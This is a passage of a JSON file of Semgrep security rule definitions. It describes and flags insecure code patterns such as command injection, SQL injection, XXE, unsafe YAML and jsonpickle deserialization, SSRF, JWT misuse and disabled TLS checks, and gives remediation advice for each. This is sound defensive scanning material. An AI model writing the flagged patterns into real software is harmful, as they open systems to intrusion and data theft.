controllable by an external resource. You may consider using 'shlex.escape()'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec)\n - [https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec)\n - [https://docs.python.org/3/library/shlex.html](https://docs.python.org/3/library/shlex.html)\n","text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","id":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","name":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","id":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","name":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"help":{"markdown":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n","text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","id":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","name":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","id":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","name":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli)\n - [https://pypi.org/project/pymssql/](https://pypi.org/project/pymssql/)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli","id":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","name":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.pymssql-sqli.pymssql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"help":{"markdown":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n","text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","id":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","name":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request)\n - [https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html](https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html)\n","text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","id":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","name":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","id":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","name":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host","id":"python.django.security.injection.tainted-url-host.tainted-url-host","name":"python.django.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"help":{"markdown":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","id":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","name":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.detailed-exceptions.detailed-exceptions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"help":{"markdown":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle)\n - [https://github.com/jsonpickle/jsonpickle#jsonpickle](https://github.com/jsonpickle/jsonpickle#jsonpickle)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","id":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","name":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"help":{"markdown":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv","id":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","name":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","properties":{"precision":"very-high","tags":["CWE-329: Not using a random initialization Vector (IV) with Cipher Block Chaining (CBC) Mode causes algorithms to be susceptible to dictionary attacks.","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-iv.hardcoded-iv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","id":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","name":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","id":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","name":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"help":{"markdown":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode)\n - [https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96](https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96)\n","text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"helpUri":"https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","id":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","name":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.unverified-jwt-decode.unverified-jwt-decode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"help":{"markdown":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input.\n\nReferences:\n - [Semgrep 